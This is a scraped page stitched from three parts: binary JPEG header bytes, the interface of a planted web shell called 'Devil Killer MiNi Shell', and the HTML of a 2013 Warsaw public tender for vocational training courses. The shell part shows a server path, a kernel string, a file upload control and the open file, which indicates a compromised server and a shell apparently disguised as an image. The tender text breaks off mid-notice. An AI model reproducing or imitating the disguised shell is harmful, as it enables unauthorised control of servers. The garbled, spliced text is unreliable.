JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130606/218710-N-2013.html

<p class="kh_header"><b>Warszawa: Organizacja i przeprowadzenie kursów zawodowych w ramach Projektu Krok do aktywności społeczno - zawodowej</b><br>
<b>Numer ogłoszenia: 218710 - 2013; data zamieszczenia: 06.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Pomocy Społecznej Dzielnicy Śródmieście im. prof. Andrzeja Tymowskiego , ul. Konwiktorska 3/5, 00-217 Warszawa, woj. mazowieckie, tel. 22 6280712, 603862090.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cps.srodmiescie.warszawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie kursów zawodowych w ramach Projektu Krok do aktywności społeczno - zawodowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie kursów zawodowych dla Uczestników i Uczestniczek realizowanego przez Zamawiającego Projektu Krok do aktywności społeczno-zawodowej (zwanego dalej Projektem), współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki 2007 - 2013. 
Zamawiający dopuszcza możliwość składania ofert częściowych, gdzie część stanowi zadanie nr:
1)Kurs masażu
Szczegółowy opis zadania znajduje się w załączniku I część nr 1
2)Kurs stylizacji paznokci
Szczegółowy opis zadania znajduje się w załączniku I część nr 2
3) Kurs dla rejestratorek medycznych
Szczegółowy opis zadania znajduje się w załączniku I część nr 3
4)Kurs florystyki
Szczegółowy opis zadania znajduje się w załączniku I część nr 4
5)Kurs Specjalista ds. marketingu i PR z obsługą programów graficznych
Szczegółowy opis zadania znajduje się w załączniku I część nr 5
6)Kurs pilota wycieczek
 Szczegółowy opis zadania znajduje się w załączniku I część nr 6
7)Kurs kroju i szycia 
Szczegółowy opis zadania znajduje się w załączniku I część nr 7
8)Kurs Magazynier z obsługą wózków widłowych
Szczegółowy opis zadania znajduje się w załączniku I część nr 8
9) Kurs dietetyki
Szczegółowy opis zadania znajduje się w załączniku I część nr 9
10) Kurs Pracownik administracyjno - biurowy z obsługą komputera
Szczegółowy opis zadania znajduje się w załączniku I część nr 10
11) Kurs Opiekun osób starszych
Szczegółowy opis zadania znajduje się w załączniku I część nr 11
12) Kurs grafiki komputerowej
Szczegółowy opis zadania znajduje się w załączniku I część nr 12
13) Kurs Projektowanie ogrodów
Szczegółowy opis zadania znajduje się w załączniku I część nr 13
14) Kurs Kadry, płace i ZUS z Płatnikiem z obsługą programu Symfonia
Szczegółowy opis zadania znajduje się w załączniku I część nr 14
15) Kurs fryzjerski
Szczegółowy opis zadania znajduje się w załączniku I część nr 15
Warunki wspólne dla wszystkich zadań, jakie musi spełniać Wykonawca:
Wykonawca jest zobowiązany do:
-zapewnienia na terenie miasta Warszawy sali szkoleniowej, której wielkość i wyposażenie umożliwi prawidłową realizację zamówienia. Zamawiający wymaga, aby kurs był zorganizowany w odpowiednich pomieszczeniach z zapewnionym zapleczem do przeprowadzenia kursu, zgodnie z przepisami prawa tj. posiadających odpowiednie warunki sanitarne, bezpieczeństwa i higieny pracy, akustyczne i jakościowe,
-zapewnienia w trakcie realizacji kursu poczęstunku (kawa, herbata, woda, soki i ciastka w każdym dniu kursu, na każdej przerwie i przed rozpoczęciem kursu, Wykonawca zapewni również ciepły posiłek w postaci drugiego dania), przedstawienia dokumentacji potwierdzającej zapewnienie poczęstunku, z imienną listą i podpisami uczestników/uczestniczek
-zapewnienia aby w czasie kursu w pomieszczeniu przewidzianym do przeprowadzenia kursu nie odbywały się inne zajęcia, 
-przedstawienia Zamawiającemu szczegółowego programu kursu oraz szczegółowego planu zajęć, z uwzględnieniem tematyki wraz z ilością godzin, opracowanego na podstawie harmonogramu przedstawionego Wykonawcy przez Zamawiającego w terminie do 5 dni roboczych  od dnia zawarcia umowy. Zamawiający zastrzega sobie prawo do zmiany harmonogramu wykonania przedmiotu umowy określonego w ust. 1 umowy, o czym Wykonawca zostanie powiadomiony z co najmniej pięciodniowym wyprzedzeniem,
-pisemnego informowania Zamawiającego o wszelkich planowanych zmianach w planie zajęć, z co najmniej dwudniowym wyprzedzeniem, 
-w przypadku odwołania zajęć z przyczyn niezależnych od Wykonawcy - informowania o odwołaniu najpóźniej w dniu zaistnienia okoliczności, 
-sprawowania nadzoru nad frekwencją uczestnika poprzez prowadzenie imiennej listy obecności (zawierającą daty kursu, ilość godzin i podpisy uczestnika kursu) oraz bieżące jej uzupełnianie. Wykonawca jest zobowiązany przekazać listę obecności Zamawiającemu na zakończenie zajęć,
-informowania Zamawiającego za pośrednictwem poczty elektronicznej o każdej nieobecności uczestnika podczas kursu w dniu zaistniałego zdarzenia,
-przekazania Zamawiającemu dziennika zajęć z programem kursu i podpisami prowadzących kurs oraz 1 egzemplarz materiałów szkoleniowych, wydawanych Uczestnikom/Uczestniczkom kursu,
-przeprowadzenia na zakończenie realizacji kursu egzaminu wewnętrznego i na jego podstawie wydania certyfikatu ukończenia kursu oznaczonego zgodnie z aktualnie obowiązującymi Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki (m.in. logo PO KL, logo UE, zamieszczenia hasła: Człowiek - najlepsza inwestycja) oraz zaświadczenia na druku MEN potwierdzającego nabycie umiejętności w zakresie kursu. Zaświadczenie i certyfikat mają zawierać nazwę kursu, termin realizacji, wymiar godzin oraz program. Wykonawca kopie powyższych dokumentów przekaże Zamawiającemu z potwierdzonym podpisami uczestników/uczestniczek kursu odbiorem oryginałów certyfikatów i zaświadczeń,
-zapewnienia w trakcie realizacji zamówienia odpowiednich materiałów szkoleniowych, długopisu i notesu,
-oznaczania wszystkich dokumentów, w tym materiałów szkoleniowych (z wyjątkiem podręcznika, jeśli jest to publikacja książkowa zakupiona w księgarni, a nie pozycja przygotowana przez Wykonawcę), zaświadczeń, certyfikatów potwierdzających zakończenie udziału w kursie, prezentacji i publikacji multimedialnych, zgodnie  z aktualnie obowiązującymi Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki (m.in. logo PO KL, logo UE, zamieszczenia hasła: Człowiek - najlepsza inwestycja), oraz umieszczania na nich informacji o finansowaniu kursu przez Unię Europejską zgodnie z wymogami, o których mowa w rozporządzeniu Rady (WE) nr 1083/2006 ustanawiającym przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności oraz uchylającym rozporządzenie nr 1260/1999 (Dz. Urz. UE L 210 z 31.07.206 r., str. 25) oraz rozporządzeniem Komisji (WE) nr 1828/2006 ustanawiającego szczegółowe zasady wykonywania rozporządzenia Rady (WE) nr 1083/2006 ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności oraz rozporządzenia (WE) nr 1080/2006 Parlamentu Europejskiego i Rady w sprawie Europejskiego Funduszu Rozwoju Regionalnego (sprostowanie Dz. Urz. UE L 45 z 15.02.2007 r., str. 4). W szczególności certyfikat powinien odpowiadać wytycznym zawartym w Strategii Komunikacji Funduszy Europejskich w Polsce w ramach Narodowej Strategii Spójności na lata 2007 - 2013 oraz Księdze Znaku Narodowej Strategii Spójności,
-zarejestrowania się w internetowej bazie ofert szkoleniowych dostępnej na stronie internetowej www.inwestycjawkadry.pl i aktualizowania w tej bazie informacji o każdym szkoleniu organizowanym w ramach Projektu nie rzadziej niż raz w miesiącu.
Wykonawca jest uprawniony do uzupełniania programu kursu oraz do jego zmiany za zgodą Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnych warunków w wyżej wymienionym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnych warunków w wyżej wymienionym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnych warunków w wyżej wymienionym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnych warunków w wyżej wymienionym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnych warunków w wyżej wymienionym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (jeżeli dotyczy),
-odpowiednie pełnomocnictwa wraz z dokumentem potwierdzającym umocowanie do udzielania pełnomocnictw, 
-oświadczenie wskazujące część zamówienia, której wykonanie Wykonawca powierzy podwykonawcom</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega możliwość wprowadzenia istotnych zmian postanowień zawartej umowy. W szczególności postanowienia umowy mogą ulec zmianie                          w następującym zakresie oraz na następujących warunkach:

1) warunki oraz termin płatności, w szczególności w przypadku konieczności uwzględnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy o udzielenie zamówienia publicznego, jak również w przypadku gdy ze względu na interes Zamawiającego zmiana warunków oraz terminu płatności jest konieczna, 
2) sposób wykonania przedmiotu zamówienia, w szczególności gdy zmiana sposobu realizacji zamówienia wynika ze zmian w obowiązujących przepisach prawa bądź wytycznych mających wpływ na wykonanie zamówienia, 
3) ograniczenie zakresu przedmiotu umowy, w przypadku zaistnienia okoliczności,                       w których zbędne będzie wykonanie danej części zamówienia wraz ze związanym z tym obniżeniem wynagrodzenia, 
4) wystąpienie klęski żywiołowej lub gdy warunki atmosferyczne lub inne obiektywne okoliczności uniemożliwiają wykonanie przedmiotu umowy; w umowie zostaną wprowadzone zmiany dotyczące terminu zakończenia robót budowlanych,
5) zmiana zakresu przedmiotu umowy i wynagrodzenia, jeżeli wystąpią okoliczności powodujące zmniejszenie zakresu przedmiotu zamówienia; w umowie zostaną wprowadzone zmiany dotyczące wynagrodzenia Wykonawcy,
6) zmiana osobowa: zmiana osób przy pomocy, których Wykonawca realizuje przedmiot umowy na inne spełniające warunki określone w SIWZ lub zmiana - za zgodą Zamawiającego, podwykonawców wskazanych w umowie (lub zakresu wskazanego               w ofercie jako planowany do powierzenia podwykonawcom); w umowie zostaną wprowadzone zmiany dotyczące osób lub/i podmiotów, przy pomocy których Wykonawca realizuje zamówienie oraz zmiany dotyczące zakresu rzeczowego wykonywanego przez podwykonawców, 
7) zaistnienie okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi; zmianie może ulec termin realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cps.srodmiescie.warszawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Konwiktorska 3/5, 00-217 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2013 godzina 09:00, miejsce: Kancelaria, ul. Konwiktorska 3/5, 00-217 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest w zakresie organizacji i przeprowadzenia kursów zawodowych dla Uczestników i Uczestniczek realizowanego przez Zamawiającego Projektu Krok do aktywności społeczno-zawodowej, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs masażu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs zostanie przeprowadzony dla 1 osoby, w terminie uzgodnionym z Zamawiającym, przy czym ukończenie kursu musi nastąpić do dnia 30 września 2013 roku. Czas trwania kursu wynosi co najmniej 120 godzin dydaktycznych - teorii i ćwiczeń. Wykonawca zobowiązany jest do zapewnienia materiałów szkoleniowych niezbędnych do przeprowadzenia kursu.
Program kursu obejmuje w szczególności następującą tematykę:
-Masaż klasyczny teoria: definicja, rodzaje i podział masażu, wskazania 
i przeciwwskazania do masażu, gabinet do masażu, warunki spełniane przez masażystę, metodyka wykonywania masażu, wpływ masażu na tkanki ustroju i cały organizm człowieka.
-Masaż klasyczny - ćwiczenia: masaż kończyny górnej: ręki, przedramienia i ramienia, kończyny dolnej, odcinka lędźwiowo-krzyżowego, masaż pleców, masaż brzucha, masaż klatki piersiowej, masaż odcinka szyjnego.
-Masaże specjalistyczne w tym: masaż sportowy, odchudzający, centryfugalny, izometryczny, relaksacyjny, limfatyczny, ciepłymi kamieniami, Lomi Lomi, refleksoterapia stóp, masaż Schiatsu, masaż pałeczkami bambusa, masaż stemplami ziołowymi, wschodnie techniki masaży..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs stylizacji paznokci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs zostanie przeprowadzony dla 2 osób, w terminie uzgodnionym z Zamawiającym, przy czym ukończenie kursu musi nastąpić do dnia 30 września 2013 roku. Czas trwania kursu wynosi co najmniej 120 godzin dydaktycznych - teorii i ćwiczeń. Wykonawca zobowiązany jest do zapewnienia materiałów szkoleniowych niezbędnych do przeprowadzenia kursu.
Program kursu obejmuje w szczególności następującą tematykę:
-Pielęgnacja dłoni i paznokci
-Produkty i akcesoria oraz zasady ich używania
-pecyfika rynku pracy
-Manicure 
-Pedicure 
-Masaż dłoni
-Stylizacja paznokci przy użyciu frezarki
-Utwardzanie i reperacja paznokci
-Stylizacja paznokci - metoda żelowa UV
-Stylizacja paznokci - metoda akrylowa
-Stylizacja paznokci - metoda Combo
-Manicure Hybrydowy
-Manicure Japoński
-Wzornictwo, zdobnictwo paznokci.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs dla rejestratorek medycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs zostanie przeprowadzony dla 1 osoby, w terminie uzgodnionym z Zamawiającym, przy czym ukończenie kursu musi nastąpić do dnia 30 września 2013 roku. Czas trwania kursu wynosi co najmniej 90 godzin dydaktycznych - teorii i ćwiczeń. Wykonawca zobowiązany jest do zapewnienia materiałów szkoleniowych niezbędnych do przeprowadzenia kursu.
Program kursu obejmuje w szczególności następującą tematykę:
A.Organizacja sekretariatu medycznego
-profesjonalna obsługa pacjenta (bezpośrednia/telefoniczna/e-mailowa),w tym obsługa trudnego pacjenta
-rejestracja medyczna
-dokumentacja medyczna według nowych przepisów
-prowadzenie i archiwizacja dokumentacji medycznej
-prawidłowe prowadzenie i obieg dokumentacji medycznej
-wypisywanie zaświadczeń
-sporządzanie wypisów dla pacjentów
-sporządzanie odpisów dokumentacji lekarskiej
-obsługa komputerowego systemu rejestracji pacjentów
B.Rola poprawnej sprawozdawczości w finansowaniu świadczeń zdrowotnych
-wyniki badań medycznych
-wypełnianie druków medycznych
C.Kultura i etyka zawodu
-budowanie profesjonalnych relacji z pacjentem
-budowanie prawidłowych relacji ze współpracownikami
-zasady dobrej współpracy z lekarzem
-dbanie o dobry wizerunek sekretariatu medycznego
D.Podstawy psychologii i pedagogiki
E.Szkolenie z pierwszej pomocy przedmedycznej
F.Zajęcia praktyczne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs florystyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs zostanie przeprowadzony dla 1 osoby, w terminie uzgodnionym z Zamawiającym, przy czym ukończenie kursu musi nastąpić do dnia 30 września 2013 roku. Czas trwania kursu wynosi co najmniej 90 godzin dydaktycznych - teorii i ćwiczeń. Wykonawca zobowiązany jest do zapewnienia materiałów szkoleniowych niezbędnych do przeprowadzenia kursu.
Program kursu obejmuje w szczególności następującą tematykę:
-aranżacja kwiaciarni, projektowanie wystaw i ekspozycji,
-zasady tworzenia kompozycji we florystyce - teoria i ćwiczenia,
-materiałoznawstwo i botanika,
-aktualne trendy we florystyce,
-bukiet okazjonalny i spiralny układ roślin - teoria i ćwiczenia,
-dekoracje w naczyniu - teoria i ćwiczenia,
-florystyka pogrzebowa i okazjonalna - teoria i ćwiczenia,
-planowanie i kosztorysowanie imprez na przykładzie imprezy ślubnej - teoria 
i ćwiczenia,
-florystyka ślubna - teoria i ćwiczenia,
-skuteczna sprzedaż i komunikacja z klientem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs Specjalista ds. marketingu i PR z obsługą programów graficznych.</p>
